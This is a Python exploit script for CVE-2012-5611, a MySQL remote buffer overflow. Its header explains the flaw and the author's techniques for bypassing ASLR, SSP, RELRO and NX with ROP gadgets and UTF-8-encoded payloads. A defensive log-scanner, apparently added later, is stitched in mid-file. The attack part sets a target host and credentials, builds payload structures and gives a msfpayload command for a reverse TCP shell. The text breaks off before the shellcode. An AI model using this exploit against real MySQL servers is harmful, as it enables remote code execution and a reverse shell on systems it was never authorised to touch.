#!/usr/bin/env python
# 27/12/12 - status : public release
# CVE-2012-5611 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5611 )
# -------- Author : ipv
# -------- Impact : high
# -------- URL : http://blog.ring0.me/
# -------- Description
#
# The code below is linked to CVE-2012-5611, a flaw discovered by kingcope.
# MySQL server is prone to a remote buffer overflow that allows a remote
# authenticated attacker to reach code execution in the context of the user
# running the MySQL instance (default: mysql user).
# The vulnerability resides in the acl_get function, called when an
# authenticated user requests a privileged Account Management statement.
# MySQL fails to verify the length of the user-controlled "db" parameter.
#
# end=strmov((tmp_db=strmov(strmov(key, ip ? ip : "")+1,user)+1),db);
#
# The destination address of the strcpy is located on an mmaped page dedicated
# to the user connection, which allows a buffer overflow into adjacent memory.
#
# Different attack vectors may be possible depending on the system.
# FYI Microsoft Windows versions are vulnerable as well.
#---------------------------------------------------------
# To bypass ASLR/SSP/RELRO/NX:
#------------------------------------------------------------------------------
# I take advantage of the threading model. This means MySQL uses only one
# address space for all MySQL resources (data structures, network management,
# sessions, etc.).
# To bypass SSP, I overwrite the sysinfo handler (pointing to the sysenter
# vdso) of the TCB structure located higher on the stack.
# The ROP chain aims to pivot to our controlled stack data. At this point,
# if we overwrite the sysinfo handler, we cannot use ret2libc and/or the GOT
# dereferencing technique, since the libc API relies on the sysinfo pointer
# to call sysenter.
#
# So to accomplish code exec, afaik, you have two ways:
# 1 - Extract the sysinfo of an intact TCB and use it as a proxy call
# (or you can restore the first sysinfo after doing modifications on the GOT)
# -> I use it for the redhat exploit (no SSP on redhat/centos);
# -> this allows us to bypass RELRO/ASLR/NX.
# 2 - Find an int 0x80 / sysenter gadget in .text
# (a bad instruction follows the int 0x80 gadget, so you have one shot to get
# code exec; I advise you to find a sysenter instead).
# - I use sysenter for ubuntu 10.04 self-compiled with SSP.
# - this allows us to bypass RELRO/SSP/ASLR/NX.
#
# Shellcodes are alphanumeric-mixed (skylined's tool ftw). The exploit bypasses
# SSP/ASLR/NX.
#
#---------------------------------------------------------
# UTF-8 and ROP chains limitation :
#---------------------------------------------------------
# MySQL Schema Object Names restrict database names to alphanumeric characters
# (plus $ and _).
# To bypass it, I use UTF-8 encoding with bytes lower than 0x80. Encoding is
# done by MySQL when the database name is quoted with `` (mandatory to
# successfully exploit the target). Yes, the devil is in the details.
# MySQL reference : https://dev.mysql.com/doc/refman/5.1/en/identifiers.html
#
# For any comments/job offer, mail me : ipv _at_ consortium-of-pwners . net
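As an added, defender-side example that is not part of the original exploit: the header above says the overflow is reached through the length of the backtick-quoted "db" identifier in a privileged account-management statement, and that unquoted identifiers are limited to alphanumerics plus $ and _. The script below scans MySQL general-log lines (constructed samples, not real captures) for GRANT/REVOKE statements whose quoted database identifier exceeds MySQL's documented 64-character identifier limit or falls outside that alphabet; the log layout and the regexes are assumptions.

```python
import re

# MySQL documents a 64-character limit for database names (identifiers.html).
MAX_DB_NAME_LEN = 64
# Unquoted identifier alphabet described in the header above: alnum plus $ and _.
UNQUOTED_IDENT_RE = re.compile(r"^[0-9A-Za-z$_]+$")
# Account-management statements naming a database as ON `db`.* (`` escapes a backtick).
ACL_STMT_RE = re.compile(
    r"^(?:GRANT|REVOKE)\b.*?\bON\s+`((?:[^`]|``)*)`\s*\.",
    re.IGNORECASE | re.DOTALL,
)

def check_statement(sql):
    """Return findings for one SQL statement; an empty list means nothing odd."""
    m = ACL_STMT_RE.search(sql.strip())
    if not m:
        return []
    db = m.group(1).replace("``", "`")
    findings = []
    size = len(db.encode("utf-8"))
    if size > MAX_DB_NAME_LEN:
        findings.append("oversized db identifier (%d bytes)" % size)
    if not UNQUOTED_IDENT_RE.match(db):
        # Legal inside backticks, but worth a look next to the length check.
        findings.append("db identifier uses characters outside [0-9A-Za-z$_]")
    return findings

def scan_general_log(lines):
    """Return (line_no, findings) for each general-log Query entry that is flagged."""
    hits = []
    for n, line in enumerate(lines, 1):
        # Assumed general-log layout: "<time> <thread id> Query <sql>".
        _, sep, sql = line.partition(" Query ")
        if not sep:
            continue
        findings = check_statement(sql)
        if findings:
            hits.append((n, findings))
    return hits

# Constructed sample log lines (not captured from a real server).
SAMPLE_LOG = [
    "121227 10:15:01    3 Connect   test@192.0.2.10 on ",
    "121227 10:15:02    3 Query     GRANT SELECT ON `shop`.* TO 'test'@'%'",
    "121227 10:15:03    3 Query     GRANT SELECT ON `" + "A" * 200 + "`.* TO 'test'@'%'",
    "121227 10:15:04    3 Query     REVOKE ALL ON `caf\u00e9 db`.* FROM 'test'@'%'",
]

if __name__ == "__main__":
    for n, f in scan_general_log(SAMPLE_LOG):
        print("line %d: %s" % (n, "; ".join(f)))
```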
########################################################################
# Modules
#
import pymysql
import sys
import struct
import os, socket
########################################################################
# Authentication options
#
MYSQL_USER = "test"
MYSQL_PASSWORD = ""
#MYSQL_HOST = "192.168.130.147"
MYSQL_HOST = "192.168.130.129"
MYSQL_PORT = 3306
########################################################################
# Helper
#
def _x(v):
    if isinstance(v, str):
        return v
    return struct.pack("<I", v)
# TCB is used when we face SSP
class _TCB:
    tcb = 0 # updated later by a ret gadget
    dtv = "BBBB"
    _self = "CCCC"
    multiple_threads= "DDDD"
    sysinfo = 0 # SEIP - updated later by stack pivot gadget
    stack_guard = "AAAA"
    pointer_guard = 0 # updated later by a pop pop ret gadget
# base class
class rc_base:
    eip_off = 0
    align_payload = 0
    align_stack = 2048
    retsled = ""
    safe_overwrite = ""
    pivot = ""
    pppr = ""
    ppr = ""
    # ./msf/msfpayload linux/x86/shell_reverse_tcp2 LHOST=192.168.130.1 LPORT=4444 R | ./alpha2 esp
    # XXX - CHANGEME !
    sc_rev_tcp =